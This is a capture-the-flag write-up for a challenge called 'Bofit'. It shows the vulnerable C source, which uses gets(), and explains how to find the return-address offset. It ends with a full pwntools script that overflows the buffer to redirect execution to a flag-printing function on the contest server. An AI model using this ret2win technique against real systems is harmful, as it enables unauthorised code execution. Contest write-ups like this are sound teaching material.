Bofit
Buffer overflow

Challenge

Because Bop It is copyrighted, apparently
nc umbccd.io 4100
Author: trashcanna

Solution

We want to jump here:
1
void win_game(){
2
char buf[100];
3
FILE* fptr = fopen("flag.txt", "r");
4
fgets(buf, 100, fptr);
5
printf("%s", buf);
6
}
Copied!
Using Redare2, the address is 0x00401256.
1
int play_game(){
2
char c;
3
char input[20];
4
int choice;
5
bool correct = true;
6
int score = 0;
7
srand(time(0));
8
while(correct){
9
choice = rand() % 4;
10
switch(choice){
11
case 0:
12
printf("BOF it!\n");
13
c = getchar();
14
if(c != 'B') correct = false;
15
while((c = getchar()) != '\n' && c != EOF);
16
break;
17
​
18
case 1:
19
printf("Pull it!\n");
20
c = getchar();
21
if(c != 'P') correct = false;
22
while((c = getchar()) != '\n' && c != EOF);
23
break;
24
​
25
case 2:
26
printf("Twist it!\n");
27
c = getchar();
28
if(c != 'T') correct = false;
29
while((c = getchar()) != '\n' && c != EOF);
30
break;
31
​
32
case 3:
33
printf("Shout it!\n");
34
gets(input);
35
if(strlen(input) < 10) correct = false;
36
break;
37
}
38
score++;
39
}
40
return score;
41
}
Copied!
In the above function, all the cases are implemented safely with c = getchar(); except for "Shout it!", which uses gets(). gets() does not check the input length and is prone to buffer overflows.
We can play the game until "Shout it!" appears and pass in the output of msf-pattern_create -l 1000 as the input. When the game ends and the function returns, the app crashes and we can see the saved RIP value.
We know the offset is 56.
We have the info we need to craft our payload! The only trick here is to implement some logic to "play the game" until "Shout it!" is used. After sending our payload and overwriting the RIP, we need to give a "wrong" input so that the function returns.
1
from pwn import *
2
​
3
ret = 0x00401256
4
offset = 56
5
payload = b""
6
payload += b"A" * offset
7
payload += p32(ret)
8
print(payload)
9
​
10
conn = remote('umbccd.io', 4100)
11
​
12
conn.recvuntil('BOF it to start!')
13
​
14
line = conn.recvline()
15
while b'Shout it!' not in line:
16
line = line.decode()
17
conn.send(line)
18
line = conn.recvline()
19
​
20
conn.send(payload + b"\n")
21
conn.recvline()
22
conn.send(b"A" + b"\n")
23
print(conn.recv())
24
​
25
conn.close()
Copied!
Copy link